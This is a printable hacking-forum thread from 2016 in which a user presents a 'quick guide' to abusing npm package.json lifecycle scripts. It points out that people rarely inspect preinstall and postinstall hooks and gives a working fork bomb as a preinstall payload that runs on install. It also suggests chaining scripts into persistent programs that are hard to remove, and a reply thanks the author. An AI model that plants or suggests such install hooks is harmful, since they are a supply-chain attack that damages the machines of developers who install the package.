![]() |
|
Quick guide to exploiting npm's scripts tag - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: Quick guide to exploiting npm's scripts tag (/Thread-Quick-guide-to-exploiting-npm-s-scripts-tag) |
Quick guide to exploiting npm's scripts tag - Inori - 05-27-2016 When creating your package.json file for an npm module (basic tutorial), one of the tags you have access to is "scripts". Normally, package authors don't include these scripts, because they're not usually necessary. This is convenient for us, as people don't check for malicious content within these script tags. A simple usage could be a welcome message to users: Code: {
...
"scripts": {
"postinstall": "cat welcome.txt"
}
}What scripts are available? As shown in npm's docs here, the available script operations are available:
What do I include in these? The "scripts" actually execute as unix commands, so any kind of damage you can do within a terminal, you can do with an npm script (look into "unsafe-perm" for more on this). For a (kind of skiddy but simple) example, you can execute a fork bomb right before the package is installed: Code: {
...
"scripts": {
"preinstall": ":(){ :|:& };:"
}
}Tips Chaining together combinations of scripts, you can make annoyingly persistent programs that can be very frustrating to remove. It's currently 1:30 AM as I'm writing, so if there's anything that doesn't make sense, PM me and I'll fix it in the morning RE: Quick guide to exploiting npm's scripts tag - Infinity - 05-27-2016 Very interesting, thanks for the share! |